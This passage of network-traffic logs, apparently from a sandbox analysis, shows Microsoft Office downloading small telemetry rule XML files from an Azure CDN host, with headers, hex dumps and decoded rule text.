                                                                                                                                                                                                                                            2024-11-14 12:02:38 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            88192.168.2.44969913.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:38 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:39 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 469
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                                                                            x-ms-request-id: 5df09d77-001e-00a2-0c15-2dd4d5000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120239Z-16547b76f7f76p6chC1DFWctqw0000000kng00000000bv77
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:39 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            89192.168.2.44969213.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:39 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:39 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 470
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                                                                            x-ms-request-id: 52d88e03-c01e-007a-7b0b-2db877000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120239Z-16547b76f7f67wxlhC1DFWah9w0000000kn0000000005dz2
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:39 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            90192.168.2.44970013.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:39 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:39 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:39 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 416
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                                                                            x-ms-request-id: ea775dbe-901e-0016-4f03-2defe9000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120239Z-16547b76f7fx6rhxhC1DFW76kg0000000kpg000000001phw
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:39 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            91192.168.2.44970113.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:39 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:39 UTC498INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:39 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582B91EAD002"
                                                                                                                                                                                                                                            x-ms-request-id: 4c357a87-301e-0051-687a-3638bb000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120239Z-r178fb8d765skzg4hC1DFW090c00000000q0000000008xvg
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache-Info: L2_T2
                                                                                                                                                                                                                                            X-Cache: TCP_REMOTE_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:39 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            92192.168.2.44970213.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:39 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:39 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 432
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                                                                                            x-ms-request-id: 392771d5-701e-000d-1cd2-2c6de3000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120239Z-16547b76f7f9bs6dhC1DFWt3rg0000000km0000000006dsn
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:39 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            93192.168.2.44970313.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:39 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:39 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 475
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BBA740822"
                                                                                                                                                                                                                                            x-ms-request-id: 50ec53c4-601e-0070-35a1-34a0c9000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120239Z-r178fb8d765d5f82hC1DFWsrm800000002k00000000097df
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:39 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            94192.168.2.44970413.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:40 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:40 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BB464F255"
                                                                                                                                                                                                                                            x-ms-request-id: 44d502e9-701e-000d-5c08-2c6de3000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120240Z-16547b76f7f775p5hC1DFWzdvn0000000khg00000000a12d
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:40 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            95192.168.2.44970513.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:40 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:40 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 474
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                                                                                            x-ms-request-id: 7f89f3e9-b01e-0021-1040-36cab7000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120240Z-1749fc9bdbdfj9bwhC1DFWvdqg000000029g00000000843a
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:40 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            96192.168.2.44970613.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:40 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:40 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                                                                                            x-ms-request-id: fa98855d-501e-0064-4540-361f54000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120240Z-16547b76f7fmbrhqhC1DFWkds80000000kpg00000000632r
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
